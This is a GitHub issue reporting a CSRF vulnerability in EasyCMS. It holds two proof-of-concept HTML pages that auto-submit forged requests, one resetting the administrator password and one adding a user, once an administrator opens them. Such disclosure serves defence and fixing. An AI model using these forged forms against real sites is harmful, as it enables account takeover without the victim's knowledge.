Skip to content
This repository has been archived by the owner on Dec 26, 2019. It is now read-only.

There is a CSRF vulnerability that can add a ordinary user and update the administrator password #5

Closed
SDrac0nids opened this issue Jul 26, 2018 · 0 comments

Comments

@SDrac0nids
Copy link

After the administrator logged in, open the following page
poc:
one.html --update the admin password

<html>
<form action=http://127.0.0.1//EasyCMS-master/index.php?s=/admin/rbacuser/update/navTabId/listusers/callbackType/closeCurrent method=POST>
<input type="text" name="id" value="6" />
<input type="text" name="password" value="666" />
</form>
<script>
document.forms[0].submit();</script>
</html>

two.html --add a ordinary user

<html>
<form action=http://127.0.0.1/EasyCMS-master/index.php?s=/admin/user/insert/navTabId/listusers/callbackType/closeCurrent method=POST>
<input type="text" name="username" value="test5" />
<input type="text" name="password" value="abc5" />
<input type="text" name="email" value="abc5@qq.com" />
<input type="text" name="sex" value="1" />
<input type="text" name="islock" value="0" />
</form>
<script>
document.forms[0].submit();</script>
</html>
@SDrac0nids SDrac0nids changed the title There is two CSRF vulnerability that can add a ordinary user and update the administrator password There is a CSRF vulnerability that can add a ordinary user and update the administrator password Jul 26, 2018
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants